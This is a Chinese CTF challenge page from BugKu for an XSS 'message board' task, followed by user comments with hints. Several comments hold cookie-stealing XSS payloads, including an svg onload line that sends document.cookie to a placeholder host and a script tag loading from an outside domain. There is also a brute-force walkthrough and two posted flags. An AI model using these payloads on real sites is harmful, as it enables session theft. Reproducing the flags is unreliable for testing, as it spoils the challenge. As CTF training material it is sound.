留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3508
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
lwq522725 2年前

sCRiPt/SrC=//i0.al/Logugk>

回复 0

qixi 2年前

直接放入xss平台地址留言就行了

回复 0
Jaylon 2年前

来个xss平台

回复 0

popoh 2年前

db.sql压根就没有

回复 6

songci 2年前

flag{750d33e925f6dbf1784a1a924c237534}

回复 0

19881191586 2年前

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3

treasure11 2年前

....太难了

回复 0

mAns0nw0W 2年前

flag{0d25978069e52fed99591c5c19ca0663}

回复 0

APTX4869ZRC 2年前

BugKu真的很酷

回复 0

Warm2pPing 2年前

提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧

回复 0

kanljk 2年前

<svg onload="window.open('http://IP/'+document.cookie)">

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(20)

解题动态

woshicaocao 攻破了该题 19小时前
小白d 攻破了该题 3天前
mybugku26 攻破了该题 3天前
willow 攻破了该题 5天前
15219889677 攻破了该题 6天前
hys 攻破了该题 7天前
6ufui 攻破了该题 10天前
whshkdh 攻破了该题 11天前
lixing123 攻破了该题 11天前
岸环线南追玉兔 攻破了该题 12天前
tabwux 攻破了该题 12天前
juicebug 攻破了该题 12天前
耶无忧 攻破了该题 13天前
ljjbit 攻破了该题 14天前
LooP-lp 攻破了该题 14天前
chihaya anon 攻破了该题 15天前
Yan123 攻破了该题 15天前
__tian__ 攻破了该题 15天前
murder 攻破了该题 15天前
zuo 攻破了该题 15天前
问题反馈